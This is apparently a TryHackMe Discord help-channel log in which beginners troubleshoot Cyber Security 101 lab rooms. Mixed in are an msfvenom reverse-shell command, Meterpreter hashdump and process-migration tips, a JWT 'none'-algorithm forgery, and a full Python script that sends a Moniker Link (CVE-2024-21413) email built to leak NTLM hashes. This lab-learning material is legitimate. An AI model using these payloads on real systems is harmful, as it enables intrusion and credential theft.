#cyber-security-101-path

ready to go right?

payload set, lhost and lport to my attack box

started

now working.....

bugged out i guess. Thanks anyways @woeful jungle

Gave +1 Rep to @carmine pollen (current: #1942 - 2)

lol

2 days

Ignore that timer please , it's useless 🙂

Very inaccurate

so i'm doing the SOC level 1 learning path and currently am sitting on last question of Friday Overtime and i needed to provide the SHA1 hash for a family spyware agent targeting androids and i've been trying to complete the question but i can't succeed.. like i've looked even at the walkthroughts and the answer given there doesnt even work
1c1fe906e822012f6235fcc53f601d006d15d7be

@woeful jungle

That doesn't seem like a correct answer

hhmk

so i found the answer but it wasnt the SHA-1 hash

i think the description of the question and the actually answer don't match anymore.. might wanna fix that

@woeful jungle

Can anyone help me?

I am in windows PowerShell room. When I use new type command, give that the files exist. And when I use the remove command, give me that the file isn't exist

Screen shots?

I can't send screenshots

The problem have been solved

You need to verify in order to upload images , follow instructions from the link below to learn how to do so 🙂

can someone give a hint for the owasp ssrf admin page? i've read several ssrf resources and explanations. but, i'm not seeing the solution here. i've tried messing with the headers for both the GET /admin request and the GET request with the download parameters.

Check out this message 🙂
#room-help message

I appreciate the link to the message. I looked around a few different areas of the discord trying to find info. I still have a further question though... I chatted with someone about this and the chat led me to test other URL encoded characters, and other characters were working. It wasn't isolated to #. can you explain why this is?

That all depends how the app is coded on the back-end and how it exactly processes our input

okay thanks.

Gave +1 Rep to @woeful jungle (current: #1 - 5427)

Hello. Littel stuck on owasp task 20

I have edited the JWT with the none algo - replaced in the source JWT but cannot get the flag

nvm.... - clipboard issues

done 🙂

is there a reason the clipboard sometimes saves a copy and sometimes doest on the vm?

sometimes i can copy pasta no problem, then other times i need to edit the clipboard

am i being dumb?

like do i have to replace the text in the clipboard everytime i want to paste into the vm

Yeah, if you are on Chrome browser can share the clipboard with your os so you can use ctrl+c and ctrl+v just like you would normally on your computer 🙂

Hi everyone, I’d like to ask a question. I recently completed the Pre-Security learning path and I’m now moving on to the Cyber Security 101 path. However, I’m a bit confused about how the modules are organized, as there’s a mix of rooms focused on both red team and blue team. I’m studying with a focus on the blue team, so what would be the correct way to go through this path? Should I follow the modules in order or only study the ones related to the blue team?

do all of cyber 101. Gives you foundations for every path 😉

Follow the order , Cyber101 teaches fundamentals in general it isn't geared specifically to either red/blue team . After Cyber101 move to SOC1 path 🙂

@woeful jungle What should i learn in day one of linux os in system exploitation.

Did you went through Linux Fundamentals module ?

In tryhackme?

yes

Nope, but i learnt linux fundamentals from YouTube.

I know linux commands (not related to privlege escalation)

File structures

Basic things before starting to hack

If you want to learn more about Linux PrivEsc check out this room
https://tryhackme.com/room/linprivesc

Is it covers things that i need to know before learning linux privlege escalation

Yes it does , it is beginner friendly . You can also check Linux fundamentals path on THM
https://tryhackme.com/module/linux-fundamentals

thx for the answer!

Gave +1 Rep to @woeful jungle (current: #1 - 5445)

How can I get out from zsh shell?

I want to go back to regular mode

Try Ctrl+z

THX

Gave +1 Rep to @woeful jungle (current: #1 - 5450)

my man @woeful jungle you avail?

Running into issues with shells overview practical task. Running the reverse shell on the browser, but not getting anything on my listening port. It worked once but showed - cant access tty, job control turned off.

Tried again, now when i enter the rev shell in browser it just says connecting and seems to be stuck

found an old @woeful jungle post describing the issue, putting ; before and after done the trick

Is everything ok now 🙂 ?

all good thanks

Keep up the good work 🙂

Congrats , great job 🙂 🚀

Hello Guys:
Please suggest me an ACTIVE DIRECTORY course or material...
I am feeling very difficult in learning and understanding it

Congragulations Bro...

Check this one out 🙂
https://tryhackme.com/module/hacking-active-directory

I have checked this one, but it doesn't cover about AD...
It covers how to exploit and protect it...

There is AD basics room, which i have covered but it felt a little difficult

Have you looked at Microsoft's documentation?

Congratulations!1 Keep up the good work 🔥

The Metasploit: Exploitation(Msfvenom) Getting the following error: "core_channel_open: Operation failed: 1" upon trying to open files using the shell. Anyone faced this previously. @novel lintel I saw a ping from you about the same issue which I am facing. Any resolution for it.

Also upon using the hashdump module available on metasploit getting the error: "Post aborted due to failure: no-access: Shadow file must be readable in order to dump hashes".

you need to be in root

with cd /

then try hashdump

Im new to cybersecurity and open to learn pls

the "Blue" room is amazing , is there many other room like this one ?

Check this module 🙂
https://tryhackme.com/module/metasploit

ye i already did, i meant more like the kind of room like "Blue" where its really to manipulate the differents commands we learn, like its really practical and less theoric 🙂

Check out this network
https://tryhackme.com/room/wreath

oh 😄 seems really complete, will give it a try but is it inside the 101 path ? if not should i not finish the 101 path first before trying these ?

Wreath is a beginner network and it is guided , you should be good

Ok, thanks a lot !

Gave +1 Rep to @woeful jungle (current: #1 - 5481)

Let´s Go| Returning after some time away from tryhackme. Starting over this pathway, and now i already did almost 35%.

Welcome back 🙂

We can't help you with that , contact local authorities

I was in root and was not able to view the shadow file.

I was able to reslove after thinking through the workflow mentioned.

Hi everyone,

New here. I'm looking into a career change into tech - particularly cybersecurity. I've come across tryhackme and it's been a wonderful experience so far, really interesting. I know I've just scraped the tip of the iceberg, but any advice, tips, and tricks would always be appreciated. 🫡

Welcome to community 🙂 👋 . If you're currently going through Cyber101 you're on a right track just keep going 🙂 🚀 . If you ever need any help feel free to reach out 🙂 .

welcome, any helps please let us know

Welcome aboard

Done!

why cant i send screenshot on this channel ? also my question is why i cannot paste something on the Virtual Machine like right know i have to copy a code and paste it on Pluma, i can copy it but i can't Paste it , CTRL +V or right click paste doesnt work any solutions pls ?

You must verify to upload images , follow instructions from the link below to learn how to do so 🙂

For pasting you can use clipboard

https://cdn.discordapp.com/attachments/522158539129618453/1336120736753913977/clipboard.gif?ex=68607ee7&is=685f2d67&hm=5e944092432779c9c68a90573e13d13cdd21a41cea7738bad5ac4ddf5eb7d0e7&

Getting this error when trying to start machine
The attack box is working fine

It should be fixed now , can you try again 🙂

I have the situation, that my vm will not start in Split-Screen view. In that case, i should use the blue Show Split View button at the top of the page. I could not find any button there!

it works now, thanks🙏

Oh , ye thanks !!

Gave +1 Rep to @woeful jungle (current: #1 - 5507)

Been having this issues and whrn I run guid, I get NT AUTHORITY\SYSTEM

try migrating to the process sploosv.exe it is the most stable

does spoolsv.exe hold login credentials as lsass.exe does?

I tried to run hashdump but the session died. Am I doing something wrong or is this an internal error

hmm no, i dont think so, i just remember than migrating was failing a lot until i tried spoolsv.exe, use ps to see all process, if its still dying try restarting the machine and try again

Okay I'll do that

I was able to run it using the web-based Kali! Proud of myself

Just got the "Blue" room and I see why you love it

ye 😄 hahaha

How can I get .py files from Exploit-DB? I'm stuck at the Vulnerable and Outdated Components - Lab, cause I keep getting .txt when trying to download the script from the site. TIA.

I finished this one yesterday

Getting this error when starting the VM in Moniker link room

Terminate that instance, refresh a web page and start a new one

that helpeed, thanks

Gave +1 Rep to @woeful jungle (current: #1 - 5511)

Anyone around that is familiar with docker? I'm trying to get OpenVAS running in my vm, but I'm getting a weird error when trying to connect to it in the browser.

ive tried this using both port 443 and port 80 as i thought it could be certificate related

I have the same issue in Active Directory Basics room.

Hello. I am a beginner and I am in the nmap room, learning how to use the tool. I just used grep to look at scripts for the OS. The next question says to read the script for the OS, but I can't figure out how to open it up. Any advice?

Try to look at /usr/share/nmap/scripts/

Hey, right now im in the wifi hacking 101 room and i have some issues setting up aircrack. Im on windows and read that airmon is only available on linux and freebsd. In the built in kali machine i seem to not have the privileges to use airmon. Is there a way to use it or should i set up a vm with linux?

Use sudo

ah right, thanks

well now it's saying i should install the lspci package but sudo apt install pciutils won't work :(

Hey guys, I hope you are doing well !
Trying to find a flag on a wireshark file that is decrypted. The file is pretty long, any tips on what i should be looking for to find where it is ?

You can search for keywords in wireshark

Right but the search only works on the packet list not inside a packet ? I'm afraid my flag is inside on one

found it, thanks !

@woeful jungle why's the answer is incorrect although this is answer.

I will check it when i get back to my pc and i will give you an update

Okay @woeful jungle

Hi,
to be precise:
'192.168.0.1/24 network' - should be '192.168.0.0/24 network'
'Nmap: The basics'

Which room is this ?

Wire shark

The basics

You're using long dashes use normal US layout dash , refresh the page and copy this
9a01a-4696-7e354b00

Thank you, @woeful jungle

Gave +1 Rep to @woeful jungle (current: #1 - 5547)

The problem have been solved.

Nice, glad to hear that , keep up the good work 🙂 🚀 . Just remember to use US layout for answers on THM 🙂

Welcome 🤗

Hey can i get a help `? I think it's some bug.

On The Module "Hashing Basics" in Task 2 - Task "What is the SHA256 hash of the passport.jpg file in ~/Hashing-Basics/Task-2?"

When doing trough terminal check the sha256sum passport.jpg i got a key "e802bf225891b81d9e87b0bfdc8345411564842a982f6d459ca2c395ff2a733e" and that's is wrong...

But when i was checking internet for answer to this question -> there is different answer "77148c6f605a8df855f2b764bcc3be749d7db814f5f79134d2aa539a64b61f02" which is right....

sorry i can't send any picture here.

what command did you use?

sha256sum passport.jpg

you need to use sha256sum when checking SHA256

yeah

Thats what i did

did you cd into the directory with it?

Okay are you sure it's the right file?

not sure if you have to cd into the dir

Yep , i

So you already had the answer put in but it's one from the internet and not from your terminal?

i am even tryed to sha256sum /home/user/Hashing-Basics/Task-2/passport.jpg

huh

Did you change anything inside that file? slightest change will throw off the whole hash

i was thinking the same

did you nano into it on accident or did you try to open it?

hmmmm

okey i tryed to open it before with nano. Just see what inside

😄

😱

I didn't know thats its changing a file hash staight...

i think you solved the mystery @topaz carbon

is it?

you might've typed in something or got rid of something on accident and saved it

Did I?

wooo

good job mago

+rep @topaz carbon

Gave +1 Rep to @topaz carbon (current: #1023 - 5)

Oooomg realy..

Thankh you guys !

Thanks broski

Gave +1 Rep to @civic raft (current: #378 - 18)

Yea bro, anytime.

+rep @civic raft

Gave +1 Rep to @civic raft (current: #361 - 19)

+rep @topaz carbon

you got it right, you probably did something wrong on accident :) good job on getting it right even though that explorer energy kinda messed up your flow

i think there is a CD on rep

you can wait a minute or two n then try to +rep him

just make sure not to forget since he deserves it more than i lol

ahahaha. Yep thank you !

Will do.

+rep @topaz carbon

+rep @topaz carbon

Gave +1 Rep to @topaz carbon (current: #894 - 6)

Hello 👋👋

Hello

How can I expand the hash in powershell?

You can save it to a file and read it from it directly

Add > file.txt to your get-filehash cmdlet

ah beautiful thank you

I am unable to share image in any group don't know why

You need to verify first , follow instructions from the link below to learn how to do so 🙂

i have no idea what to do now i dont get that part what should i do? Metasploit Exploitiation Task 6. Can someone help me

You should run wget command on target not on AttackBox

@woeful jungle Also having an error with Task 6, Metasploit: Exploitation room. I'm trying to create a payload on AttackBox, but keep running into this error "Error: You must select an arch for a custom payload".

Here is my syntax "msfvenom linux/x86/meterpreter/reverse_tcp LHOST=10.10.137.9 LPORT=7777 -f elf > rev_shell.elf"

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.137.9 LPORT=7777 -f elf > rev_shell.elf

Sorry, can't find a way to attach my screenshot just yet

Darn!!! Silly me. Thanks millions

-p flag is used to specify payload

Yeb!! Saw what I missed there

hi, i have ca problem with dnsmasq

someone know how to solve it ?

Did you insert nameserver 10.10.31.221 as first line?

nano that file and do it

yes i did it

then why is the first line not have namerserver 10.10.31.221 showing?

ok

because i restarted attackbox

sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

Thx

Gave +1 Rep to @woeful jungle (current: #1 - 5567)

you just saved my pentester career

is it problematic if i dont understand how all those reverse sheell works ?

Yeah it is , most people use generator like this one anyway 🙂
https://www.revshells.com/

But you will get used to it over time

Any tips on getting into cybersecurity? I’m currently thinking of either taking the google cybersecurity or IBM cybersecurity analyst courses and after finishing one of them I want to try to get my CompTIA sec+ certification. Any tips on what course would help more?

For a career advice try to ask guys in #cyber-and-careers channel . You will get the best answer there 🙂

Hello

Got it, thank you!

Gave +1 Rep to @woeful jungle (current: #1 - 5582)

should i skip it if i am sure i want to begin a red teamer ?

Hello, shouldn't i be able to access this ip adress?

im doing the nmap room and it seems like i shoulb be able to see a flag
Question is : "Find the listening web server on and access it with your browser. What is the flag that appears on its main page?"

Use http not https

🤦‍♂️

thanks

Gave +1 Rep to @woeful jungle (current: #1 - 5583)

Definitely DON'T skip that . You need those fundamentals even if you want to be a red teamer

Ok i wont skip that, thanks

Gave +1 Rep to @woeful jungle (current: #1 - 5589)

I lost my 30 day streak 💀

You can ask staff to restore your streak 🙂

How do I do that please?

Who else is here?

The search skills room in cyber security 101 is really fun

I just started this path anyone else with me

We all are , feel free to reach out if you need any help 🙂

Hey mate I have a question

Should I start doing CTF's

I wouldn't recommend you to do so before finishing Cyber101 path

I did do pre security before this

in Linux Fundamentals Part 2
it should when i start the machine the information of target should appear but it dosent
and i dont know why
i should to use the ip address to connect by ssh but it dosent appear

Click on Start AttackBox button at top of the task once it starts use it to ssh into target machine

Does anyone have a notes or summary for the path?

Or how do you revisit information in a fast way?

Is this the channel for security+ path

There's no security+ path on THM

Really?! So should I go in SOC channel

What are you looking for exactly ?

I am studying CompTIA sec+, I asked deepseek for forums it said to go to thm's discord and find security_plus channel

We don't have that here but you can ask for a career/certification advice in #cyber-and-careers channel 🙂 .

Thnx

How do you guys approach learning new tools? Do you stick with Google and what TryHackMe teaches, or do you go more in-depth on each one?

idk what is right, but i just stick with THM for the moment and when i really need to learn smth new (while working with the tool) i will search for it
i think keep learning will take longer time and i may not even use this info / forget it

is it just me or do a handful of the cybersecurity-101 courses not function correctly? i'm on the gobuster one and when i use dir for enum it says the www.offensivetools.thm doesn't exist, and when i ping it, then i'm told it's unknown.... i feel like none of the pentesting stuff works properly

i feel like this one has to do with needing to restart the dnsmasq after editing it. when i edit it, it says "dnsmasq.service failed because the control process exited with error code."

You need to configure dns settings as per task instructions

is anyones windows powershell room at a bit glitch

help 😔

For the whole path, no. What I do is I document every step of my learning on the platform so every module/path is easier to reference back to

hi there, been having trouble with tcpdumb task number 3. They say a traffic.pcap is the file needed for the questions. But i see no such file in the terminal. Anyone has some pointers ? I tried looking for the file using commands but didnt succeed

i did it exactly as it asked 10 times, no exaggeration. in the end chatgpt helped me. i had to delete the etc/resolv.conf and manually re-create it. worked perfect after that

You're probably in the wrong directory

Alright, too bad they don't specify where that file is

hey guys I'm at the room 'blue' and apparently when I try to run my exploit 60+ sessions opened and it's still opening more

now I have 100 sessions opened

Restart both your machine and target machine , you probably encountered a crash of some kind

Can you provide some screenshots please 🙂 ?

guys iam doing network security protocol last challenge how do i know which packet to go for or the protocol

Do you mean this question? One of the packets contains login credentials. What password did the user submit?

Of course 🙂
On the left instructions say to use traffic.pcap file but i cand find that file on the terminal

What are some good boxes to throw in here and there while doing cyber security 101? Or should I finish the path first then do boxes?

You should use machine provided in the task not AttackBox

I would recommend finishing Cyber101 path before moving to challenges 🙂

Its been Helping me so much to learn as a complete beginner honestly

Yes that's the question tho but i did it it was pain but successful thanks

Gave +1 Rep to @bright vector (current: #1984 - 2)

hello

Ahh I'll check that out when I'm home. Thanks, I didn't pay attention !

Gave +1 Rep to @woeful jungle (current: #1 - 5643)

I am doing Windows Command Line room of cyber security 101 path and i am stuck at task 2 of it on this question "What is the OS version of the Windows VM?" I used then systeminfor command and i found out the OS version "10.0.20348 N/A Build 20348" but tryhackme question have this blank space "_ _ . _ . _ _ _ _ _ . _ _ _ _" i know the first 8 digit but idk what will be the last four one. Anybody please help!

Use ver command instead of sysinfo

Thanks! It worked.

Gave +1 Rep to @woeful jungle (current: #1 - 5651)

Hello, I am currently learning the CyberSec 101 path. I intend to go to SOC afterwards. Will I be able to take challenges when I finished CyberSec 101 path, just so I can practice before SOC?

Yup you will 🙂

Guys iam on nmap room and it's really fun to use and a good room to learn nmap

SOC L1 path requires Pre-Security path and Cyber Security 101. Take a look at them and see if you actually need to do them, knowledge-wise (if you have experience or have been studying for a while, you might not)

.Hello everyone!

.I've been into Cyber for quite a while now, I recently join the Cyber Security 101 Path on THM. I'd love it if anyone can guide me through or anyone we could work together in the path so we can learn together and further more into the world of Cybersecurity.

.Thank you, all 🤗

Just follow the path's roadmap it is a pretty good guide already 🙂

on "Burp Suite: The Basics" room, task 10
i can not access the page with the given ip, i tried to start apache2 and to disable foxy proxy and still the same issue

Can you provide a shot?

Why are you trying to access loopback address ?

i thought that the target is on the same system

Use http not https

i explicitly typed http, firefox seems to have a different opinion

okay, i restarted the machine and it's now accessible

Maybe you had interceptor active

What is the problem 🙂 ?

I think from GPO you need to give Philipp the ability to change the password like the sleep mode

did you force the update of the GPOs?

Guys, I'm running into an issue here. I'm in the gobuster room and trying to enum a website "www.offensivetools.thm". I have set the /etc/resolv-dnsmasq, But I'm having these errors on both the AttackBox and the Web-Based Kali. The same error on both machines

That ip seems wrong , use the actual ip of the target machine in your hosts file

There is no hosts file specified in the section. The question was to enumerate www.offensivetools.thm using gobuster

Did you add file to /etc/hosts ? Did you configure the DNS settings like the task says ? As far as I can see you aren't even connected to THM network via VPN

The only file they mentioned to mention was /etc/reslov-dnsmasq

Oh that is the web based Kali. Do I need the VPN to connect to it again?

No but that file doesn't exist on Kali I think , those are the instructions for AttackBox

hi everyone, i want to ask about my attackbox, why everytime i try to perform a telnet command i always get a bad request from it, it seem like i cant use telnet command at all

Can you provide a screenshot of what please 🙂 ?

Hello guys

I am trying to connect with Kali Linux through openvpn I just downloaded the openvpn on file and when I sudo openvpn on file the error comes at saying Ping 5 and ping-restart and my VM network settings is on NAT

dont use NAT

use bridged

that work for me like 2 yrs ago lol

I am not 100% sure though 😄

.

Okay thanks

Let me try

Still not working

Showing same error

can u send screenshot?

and screenshot of vm network settings

2 mins

I can't send it on this discord chat it's not allowing me can I DM you

this

basically i cant perform every telnet command

You need to send a request before a connection times out
GET / HTTP/1.1 Host: telnet
Hit enter twice to send a request

get it thanks sir

yes

yeah forgot to press twice me too lmao

u only need to send this
GET / HTTP/1.1

and press Enter twice

Depends Host header should be mandatory as of http/1.1 specification

I have done it thanks man

Gave +1 Rep to @cyan kindle (current: #3051 - 1)

One more thing how do I verify my account in discord

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account~

thx

Gave +1 Rep to @gritty igloo (current: #2006 - 2)

i am doing the gobuster room and I am trying to access the www.offensivetools.thm site but not able to do that

on the env setup i got an error saying The unit dnsmasq.service has entered the 'failed' state with result 'exit-code'.
ip- systemd[1]: Failed to start dnsmasq - A lightweight DHCP and caching DNS server.

sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

Hey everyone! Im currently stuck on the Networking Secure Protocols - closing notes challenge and i can't wrap my head around things. I know that the password is in a specific packet, but how in gods name would i get there? I know that its from capturing chromium browser communication. But how can i know what to search for next?

Greetings all. I'm brand new to cybersecurity and just enrolled in Cyber security 101. I’m on Linux Fundament #3 : Task7. I guess at one point there was no internet connection to the THM VMs but now there is. I was trying to follow along with this whole add-apt-repository exercise, but on Step 1, I’m getting prompted for a password. I tried the default ‘tryhackme’ password but then was presented with “tryhackme is not in the sudoers file. This incident will be reported.”

Try to inspect streams

Thm machines usually don't have internet access , I don't think that you're required to download repositories in that task

Yeah, slept on it and found out. Thanks by the way. For anybody else struggling - following all the streams is useless. What protocol could you use, to post login info. After that, you can sort by protocol, follow specific stream ("conversation") or use ctrl+f and search for specific string in packet details. Hope it helps and isn't all wrong 🙂

for task 6 in this room: https://tryhackme.com/room/socfundamentals
why it is a false positive?

Hey guys, I am new and I've been stuck on Active Directory Basics. Trying to RDP login as THM\phillip into Sophie but computer name Sophie cannot be found? I'm been trying mstsc under run command and connecting that way but computer name Sophie cannot be found....Anyone know how to RDP correctly?

Can you provide a shot of your settings

In metaexploit second part modules in the exploitation section do we use the meterpreter payload to access the NTLM hash of the 'pirate' or is generic shell enough because with generic shell enough because with generic shell I can't access the hash

Either upgrade it to meterpreter or use meterpreter payload to obtain a shell

Okay thanks I will try that

so is it a good idea to do cybersecurity 101 a second time? i feel like i forgot a lot over the weeks and had sometimes such a hard times in the rooms

Yeah I would definitely recommend you to do so 🙂

so how many times in average are people doing this path ? 😄 is it normal?

Depends on how you understanf stuff. Most people just read through and forget but as for me, I don't bother about streaks or leagues, I try to build muscle memory by reading and documenting till I understand and can explain to someone who knows nothing about computing lol.

yeah thats what i do at university as well, but as a non native speaker i struggle sometimes a lot. but as you said, it's better to build muscle memory. Maybe i go through everything again complete my notes. thanks!

Do it as much as you need and take your time it will definitely benefit you . I also like to revisit some lessons 🙂 . Like the old latin sayin' - repetition is the mother of learning 🙂

what am I supposed to do

Packet comments
     [truncated]This_is_Not_a_Flag_This_is_Not_a_Flag_This_is_Not_a_Flag_This_is_Not_a_Flag_This_is_Not_a_Flag_This_is_Not_a_Flag












Go to packet number 39765
Look at the "packet details pane". Right-click on the JPEG section and "Export data bytes

nvm got it I looked at the pcap comments the wrong way

Calculate the hash of that image use md5sum command

no it was sha256sum

md5sum came later

Just did blue room it was really fun one

i havent done it

isint it just the EternalBlue exploit?

Ya

Good Morning. Liinux Shell Room. I load the attack box, start the machine, and then use SSH to log in remotely to the box using the user account. @task2, the first question is LS to view the folder structure and then CD into the desktop folder, but this folder is not there. Am I missing something? or can someone fix this?

Deleted because its still not correct...

Capture File comment, not packet commets

Can you send a screenshot?

unable to drag a image to this chat.

@grave dock can you allow me to upload a image to this page? I can upload images to other channels but i think this one may be blocking it

I think you need to be verified for that and

You need to verify to upload images , follow instructions from the link below to learn how to do so 🙂

I think you need to find a folder which has a file in it so 'ls' each folder to find which folder has a file just and then cd into the file 'you are talking about Linux fundamentals part 1 task 5 I believe '

[Lesson] Windows and AD Fundamentals -> Active Directory Basics -> Managing Users in AD -> Delegation. Kind of cool... I guess I never really was on that side.... all places I worked already had it handled by someone else or another team. [Question] How do you undo that assignment? I get that we added Phillip delegated to reset passwords, but how would we undo that action? I went back to do the same process but Phillip wasn't pre-populated to remove the delegation access.

Shouldnt I be connected with openvpnj?

I have the tun0

and the other one adapters or whatever they are

but I still cant ping the machine

oh I know why I have like 4 differend sessions running

I used ps aux | grep openvpn
and used kill PID where PID is the procecssIDS

I had to use kill -9 PID on the ones that were running on root.

Are you doing openvpn connection with Kali

if U can sudo apt update the Kali then do it and upgrade it for openvpn. For my openvpn it was that problem if U can't you some key must have expired try chatgpt it will give you a command for key

G'day everyone hope you are all having a good day.

can anyone explain why my powershell is showing me a blank screen

nevermind it just takes a lot of time to load

You may need to type powershell in cmd window to actually start it

Thanks , good day to you too 🙂

Gave +1 Rep to @west marlin (current: #3058 - 1)

John The Ripper: The Basics Task 6

I have to run the unshadow cmd, I need access to /etc/shadow

which I do not have without root

what can I do?

The /etc/shadow file is the file on Linux machines where password hashes are stored. It also stores other information, such as the date of last password change and password expiration information. It contains one entry per line for each user or user account of the system. This file is usually only accessible by the root user, so you must have sufficient privileges to access the hashes. However, if you do, there is a chance that you will be able to crack some of the hashes.

Oh I dont need to do it, the unshadowed file is already there lol

@grave dock @molten tartan here is the image from yesterday. I was trying to post. here you can see the instruction on the left, and my commands on the right. the instructions are refering to changing the directory into Desktop from the root of User and there is no such desktop folder.

I think the terminal in the module is different than the one given that's and it's just an explanation of how those commands work not the instructions

ty cd Desktop/ or just try typing Desk then press TAB key to autocomplete

Gave +1 Rep to @tiny elm (current: #3059 - 1)

oh I see that you dont have a folder, I dont think that attackbox has Desktop, Im pretty sure the commands tryhackme put on for you to read was just for you to understand ig

what room is it, I can try also

Heyoo, probably being very stupid and missing something obvious but if I am, I have no clue what it is 😭 I am on the room Gobuster: The Basics on task 2/4 (It is mainly the steps of task 2 which is stopping me doing task 4 I believe)

Anyways, I am trying to enter the name server on the local DNS /etc/resolv-dnsmasq exactly as the steps tell me to do and I can input it with nano and using cat after shows it has worked as expected but every time (even after terminating and reopening the machine) it simply refuses to restart. Some screenshots to show this attached.

Even checked for any spaces at the end which might have been laying around but there weren't and lastly, I tried killing PIDs against port 53 perhaps thinking it'd resolve it judging from the errors given but, as I suppose you'd expect, it just instantly started running the process again.

Anyway left it for now, might have more luck tomorrow with a fresh brain but if anyone knows what this could be, will be much appriciated.

sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

Linux Shells is the room.

yea ive been acustom to just following along and working through the problems. Thank you. I moved along and finished the room. Thank you again

Gave +1 Rep to @molten tartan (current: #3063 - 1)

No worries man if U have any doubts let me know iam currently at the burp suite so if I can help I will

can I ask for help here?

thank you I was stuck here with the same issue. Got it working again.

Gave +1 Rep to @woeful jungle (current: #1 - 5732)

ya

Guys i need a help iam currently doing burp suite and i cant access the link given in the target in burp suite and the link is showing not found

Make sure to disable interceptor in Burp

Can anyone pls tell me if this path is like a good starting point?

if im a complete beginner?

Check out free roadmap 🙂
https://tryhackme.com/resources/blog/free_path

oh tysm

Perfect thank you so much that works, shouldn't that be on the room though? Or is this something obvious I missed somewhere :/

It should , there were some changes made to the attackbox . You can also add the domain to /etc/hosts it will have the same effect 🙂

Hey intercepter is off and I can't open the link I don't know Should I disable proxy in extension

Can you provide some shots of your situation

Sorry for disturbing I had forgotten to turn on the VPN that's why I am really sorry

It's all good now thanks

Hey I've got a problem with executing Moniker Link (CVE-2024-21413) vulnerability.

In the exercise I've managed to send the email to the windows machine but when clicking the link Microsoft Outlook gives me this error.

"We can't find \ATTACK_MACHINE_IP\test!exploit'. Please make sure you're using the correct location or web address."

And yes the ATTACK_MACHINE_IP is the actual attack machine's ip

Also responder isn't picking anything up either

Can you please verify and provide a shot of your script 🙂 ?

hmm it doesn't seem like i can post a picture of it here

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.0 | 19/02/2024
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://3.125.183.218/test!exploit">Click me</a></p>

    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('10.201.126.239', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\n Email delivered")
except Exception as error:
    print(error)
finally:
    server.quit()

When i hover my mouse over the Click me link in the email it reads out like this : file:///\3.125.183.218/test!exploit

Figured out the issue.

I used the Public IP for my AttackBox.
When I replaced it with the Private IP it worked like a charm.

All good 👌

Use address from tun0 Interface , that's your VPN address

Hello good day, may i ask why on Metasploit: Exploitation

task 5 exploitation
when i used my own attack machine
and followed the instructions on what needs to be done it always says fail
but when i used the attackbox msfconsole
it works and gets me to metapreter??

is something wrong with my own attack machine ? 🙁

Probably wrong LHOST value or connection problem . Make sure you're connected to THM network via VPN from your own machine and that you're using tun0 as your LHOST address

Thank you very much will try it now

Gave +1 Rep to @woeful jungle (current: #1 - 5752)

hi all,

i'm having an issue with Task 20 in owasptop102021, also in web-hacking-1

I login as guest with password guest as well.
I get the JWT token, remove the signature and modify the header with 'none' and the payload with 'admin'.
I refresh the page but it keeps giving out 'Either the token or its signatrue is invalid, no flag for you'.

I'm pretty sure that everything is right.

anyone here ?

Can you decode it in cyberchef and send us that screenshot please 🙂 ?

i managed to pinpoint my mistake:
apparently when you modify the jwt token and remove the signature, you have to leave a dot right after the payload

so that did it

thank you for reaching out 🙂

Why does the sesesion time out each time I try to hashdump?

I think the system restarts cus I cant run the exploit before like 2 mins of waiting

Happened to me too but what I did was just maybe start from meterpreter from beginning instead of shell

I never touched shell

I only did meterpreter cmds

Wait what exploit is that

exploit/windows/smb/psexec

Okay

Why did you go for PS lsass does it gives a root access

I wanted to get the ntlm hash of jchambers users

i need to migrate to lsass process

to get access to hashes

im pretty sure

tried HashDump without migrating

same thing

Okay man I can't help you with this one ask MrKGB sorry man I ain't that good yet

Its okay bro

I got the has online from a tutorial

I got the rest on my own

I think its just a bug

And why U still using attack box you should try virtual box kali

Ya sometimes the box gets buggy

I use my own machine, I just wanted to do it quick without openvpn cause i need to go work soon

Oh I see try with your machine it would work fine I believe mine did

Good luck man

Greetins all.. anyone having problems starting the attack box? I keep getting "Oh no, an error occurred while starting VM: We're temporarily at capacity. Please hold tight and try again shortly." Did a restart, refresh,.... nada

I mean, I know what it says, but I don’t know how legit it is or if it's me, or how common it is within the community. I'm new.. started about a week ago... so.. just scoping out the landscape.

i have the same problem

Looks like it is a thing.. I finally got in on both machines.

So.. Networking Core Protocols ... I'm trying to telnet into the requested device.. but it's asking for a password/username. I tried the default tryhackme/tryhackme ... am I missing something?

go back to task 2 to see the user and pass

or task 1

Yah.. I did... Task 1 is Intro. Task2 is DNS ... I'm not seeing any default creds.

hold nevermind

what task are you on

Cyber Security 101 >Networking>Networking Core Protocols> #5 -> HTTP(S): Accessing the Web Task : Use telnet to access the file flag.html on 10.201.84.217. What is the hidden flag?

did you try using sudo?

sudo / sudo ? No, but I just did, and that's not working either.

nono

sudo telnet ___

Ok.... still wants a password.

just hit enter

No Benuo

hold on lemme look back at this room

Ok.

what command are you running to use telnet?

Well, before your advise... just telnet ip

ah

you need the server port

so itll be telnet ip port

like telnet 0.0.0.0 80

I guess.. I didn't see that in the notes.. ok .. cool.. let me check

Ok.. think that was it... thanks!

yup

Cyber101-Offensive Security tooling> Gobuster: The basics. Task #2. I cant seem to restart the DNS service after inputing the new nameserver because its not even active on boot. I already tried restarting the target machine

The AI bot told me to do systemctl get Status on the dnsmasq and then it says its not even active.

Nvm question already answered #cyber-security-101-path message

Configure the settings per task instructions then run these commands to restart the service
sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

iam trying to brute force Task 11 OSWAP Top 10 room but i cant find the favorite colour or any other question how to do should i inspect web page or something

